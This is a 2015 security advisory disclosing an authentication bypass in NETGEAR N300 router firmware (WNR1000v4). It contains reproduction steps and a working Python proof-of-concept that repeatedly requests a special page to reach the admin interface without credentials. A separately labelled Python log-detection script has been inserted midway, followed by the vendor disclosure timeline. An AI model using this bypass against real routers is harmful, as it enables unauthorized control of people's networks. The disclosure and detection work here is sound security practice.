#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img
# and N300-1.1.0.28_1.0.1.img
# Vendor: NETGEAR
# CVE ID: requested
# Subject: Authentication Bypass
# Risk: High
# Effect: Remotely exploitable over LAN/WLAN
# Author: Daniel Haake (daniel.haake (at) csnc (dot) de)
# Date: 06.10.2015
#
#############################################################
Introduction:
-------------
Multiple NETGEAR wireless routers are vulnerable out of the box to an
authentication bypass attack. No router option has to be changed to
exploit the issue, so an attacker can access the administration
interface of the router without submitting any valid username and
password, just by requesting a special URL several times.
Affected:
---------
- Router Firmware: N300_1.1.0.31_1.0.1.img
- Router Firmware: N300-1.1.0.28_1.0.1.img
- tested and confirmed on the WNR1000v4 router with both firmware versions
- other products may also be vulnerable because the same firmware is used
  in multiple devices
Technical Description:
----------------------
The attacker can exploit the issue by using a browser or by writing a simple
script.
1. When a user wants to access the web interface, an HTTP basic
   authentication login process is initiated.
2. If he does not know the username and password, he gets redirected to the
   401_access_denied.htm file.
3. An attacker now has to call the URL
   http://<ROUTER-IP>/BRS_netgear_success.html multiple times.
-> After that he can access the administration web interface, and there is
   no username/password prompt.
Example Python script:
----------------------
import sys
import time
import urllib2

# Usage: python poc.py <ROUTER-IP>
target = "http://" + sys.argv[1]

try:
    # While basic auth is enforced the admin page answers with HTTP 401,
    # which urllib2 raises as an HTTPError.
    first = urllib2.urlopen(target)
    print "No password protection!"
except urllib2.HTTPError:
    print "Password protection detected!"
    print "Executing exploit..."
    # Request the special page several times, as described above.
    for i in range(0, 3):
        time.sleep(1)
        urllib2.urlopen(target + "/BRS_netgear_success.html")
    # Re-check the admin interface without sending any credentials.
    second = urllib2.urlopen(target)
    if second.getcode() == 200:
        print ("Bypass successful. Now use your browser to have a "
               "look at the admin interface.")
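From the defender's side, the request pattern described above can be spotted in an access log captured in front of the router (for example by an IDS sensor or proxy). The following Python 3 script is an added example and not part of the original advisory; the one-request-per-line log format, the 60-second window and the sample entries are assumptions constructed for this example.

```python
import re
from collections import defaultdict, deque

# Path whose repeated retrieval triggers the bypass described in the advisory.
BYPASS_PATH = "/BRS_netgear_success.html"
# Number of hits that arms an alert (the advisory's PoC sends three requests).
HIT_THRESHOLD = 3
# Window in seconds within which the hits must occur (assumption).
WINDOW_SECONDS = 60

# Assumed line format, constructed for this example:
#   <epoch> <client-ip> <method> <path> <status> <credentials-sent:yes|no>
LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"(?P<status>\d{3}) (?P<auth>yes|no)$"
)

def detect_bypass_attempts(lines, threshold=HIT_THRESHOLD, window=WINDOW_SECONDS):
    """Return a list of (client_ip, timestamp) alerts.

    An alert is raised when a client requests BYPASS_PATH at least `threshold`
    times within `window` seconds and afterwards receives a 200 for another
    router page without having sent credentials.
    """
    hits = defaultdict(deque)   # ip -> timestamps of recent BYPASS_PATH hits
    primed = set()              # ips that crossed the threshold
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue            # skip malformed lines instead of crashing
        ts, ip = int(m["ts"]), m["ip"]
        path, status, auth = m["path"], int(m["status"]), m["auth"]
        if path == BYPASS_PATH:
            q = hits[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()     # drop hits that fell out of the window
            if len(q) >= threshold:
                primed.add(ip)
        elif ip in primed and status == 200 and auth == "no":
            alerts.append((ip, ts))
            primed.discard(ip)  # one alert per successful bypass
    return alerts

# Constructed sample: 192.0.2.10 mirrors the advisory's PoC, 192.0.2.20 logs in normally.
SAMPLE_LOG = """\
1444141980 192.0.2.10 GET / 401 no
1444141981 192.0.2.10 GET /BRS_netgear_success.html 200 no
1444141982 192.0.2.10 GET /BRS_netgear_success.html 200 no
1444141983 192.0.2.10 GET /BRS_netgear_success.html 200 no
1444141984 192.0.2.10 GET / 200 no
1444141990 192.0.2.20 GET / 200 yes
""".splitlines()
```

Running `detect_bypass_attempts(SAMPLE_LOG)` yields one alert for 192.0.2.10; a client that stops after two hits or sends credentials raises none.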
Workaround/Fix:
---------------
None so far. Netgear has developed a patch that fixes this vulnerability
but has not released it yet (see timeline below).
Timeline:
---------
Vendor Status: working on patch release
21.07.2015: Vendor notified by email (security (at) netgear (dot) com)
-> No response
23.07.2015: Vendor notified via official chat support
24.07.2015: Support redirected notification to the technical team
29.07.2015: Requested status update and asked if they need further
assistance
-> No response
21.08.2015: Notified vendor that we will go full disclosure within 90 days
if they do not react
03.09.2015: Support again said that they will redirect it to the technical
team
03.09.2015: Netgear sent a beta firmware version to check whether the
vulnerability is fixed
03.09.2015: Confirmed to Netgear that the problem is solved in this version
Asked Netgear when they plan to release the firmware with this
security fix
11.09.2015: Response from Netgear saying they will not disclose the patch
release day
15.09.2015: Asked Netgear for the second time when they plan to publish the
security fix
-> No response
29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
06.10.2015: Forced public release of this advisory to follow up on [2]
References:
-----------
[1] http://support.netgear.com/product/WNR1000v4
[2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html